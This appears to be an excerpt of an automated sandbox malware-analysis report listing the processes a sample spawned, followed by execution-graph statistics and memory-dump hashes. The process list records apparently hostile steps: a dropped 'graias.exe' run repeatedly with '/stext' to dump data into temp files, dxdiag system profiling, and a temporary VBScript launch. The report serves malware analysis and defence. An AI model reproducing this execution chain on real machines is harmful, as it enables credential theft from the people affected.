                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                          Start time:18:02:28
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:18:02:33
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                                                                                                                                                                                                                                          Imagebase:0x5a0000
                                                                                                                                                                                                                                          File size:222'720 bytes
                                                                                                                                                                                                                                          MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:34
Start time: 18:02:35
Start date: 03/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 18:02:35
Start date: 03/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Imagebase: 0x140000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Imagebase: 0x20000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Imagebase: 0x8f0000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
Imagebase: 0xe80000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Imagebase: 0x1c0000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 18:02:39
Start date: 03/01/2025
Path: C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Imagebase: 0xb70000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 18:02:40
Start date: 03/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 18:02:40
Start date: 03/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 18:02:41
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:18:02:43
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\mstee.sys
                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                          File size:12'288 bytes
                                                                                                                                                                                                                                          MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:18:02:43
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                          File size:34'816 bytes
                                                                                                                                                                                                                                          MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:18:02:46
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:18:02:47
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

Target ID:52
Start time:18:02:54
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:18:02:55
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:18:02:58
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:18:02:59
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:18:02:59
Start date:03/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x3a0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:18:03:04
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:18:03:04
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:18:03:07
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:18:03:07
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:18:03:07
Start date:03/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x3a0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:62
                                                                                                                                                                                                                                          Start time:18:03:09
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                                                                                                                                                                                                                                          Imagebase:0x2b0000
                                                                                                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true


Execution Graph

Execution Coverage:8.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:17.8%
Total number of Nodes:101
Total number of Limit Nodes:15

[Execution graph: interactive node/edge rendering omitted. API calls reached in the graph: GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DrawTextExW, CreateIconFromResourceEx, GetSystemMetrics, CreateActCtxA, DuplicateHandle.]

Control-flow Graph

[Control-flow graph of the function starting at 7991f1c (legend: Executed / Not Executed); basic-block edge list omitted. Sub-functions called from its blocks: 7991f2c, 7991f38, 7991f44, 7991f54, 79932e7, 79932f8.]
Strings
Memory Dump Source
• Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Hhq$Hhq$Hhq$Hhq$Hhq
• API String ID: 0-1427472961
• Opcode ID: 4f0150a6fbf639c68f5dba3dc9957c380bfdfb9d102ab08132a1733b20f328c5
• Instruction ID: a12c46276d90ed236a6957d2a20fe166483270968df1308c95351771375671c5
• Opcode Fuzzy Hash: 4f0150a6fbf639c68f5dba3dc9957c380bfdfb9d102ab08132a1733b20f328c5
• Instruction Fuzzy Hash: 09328170A002199FEF54DFA8C8907AEBBF2BF84304F1485A9D409AB395EF349D45CB95
Strings
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Ppdq
• API String ID: 0-2552977383
• Opcode ID: 8be9499b00191683c0a191a0387eeab9db295894e2c6c685488ad52873f9c938
• Instruction ID: 514b1b7f5745b02703bcfee1fb5bf0f85712155ed80265ab08ff5bf9ac992700
• Opcode Fuzzy Hash: 8be9499b00191683c0a191a0387eeab9db295894e2c6c685488ad52873f9c938
• Instruction Fuzzy Hash: D191A074E012189FCB15DFAAD984AADBBF2FF98310F20816AE418AB355DB346941CF41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Ppdq
• API String ID: 0-2552977383
• Opcode ID: a76ff7a5e872f7637d458646b6f4ef26ec6cb11a11ea1b8421b36e404d87003b
• Instruction ID: c66e23237ec06c0521253bb2ec52a35dd8da02cf91b1d6736d81a9c70c433d3f
• Opcode Fuzzy Hash: a76ff7a5e872f7637d458646b6f4ef26ec6cb11a11ea1b8421b36e404d87003b
• Instruction Fuzzy Hash: D4817274E002199FCB54DFAAD984A9EBBF2FF98310F208129E419AB355DB346945CF40
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 798408a9161b6bd0217a299cb4c4f34716d879b61529d1b70059d475c9a8012e
• Instruction ID: 3e2efc68fb556caebf054e7ee76f8042c83dd211517c0792295322126eac1b63
• Opcode Fuzzy Hash: 798408a9161b6bd0217a299cb4c4f34716d879b61529d1b70059d475c9a8012e
• Instruction Fuzzy Hash: 93523BB0600655CFCB54DF68C588A6DB7F2FF85318F6585A8E40A9B761DB30ED86CB40
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
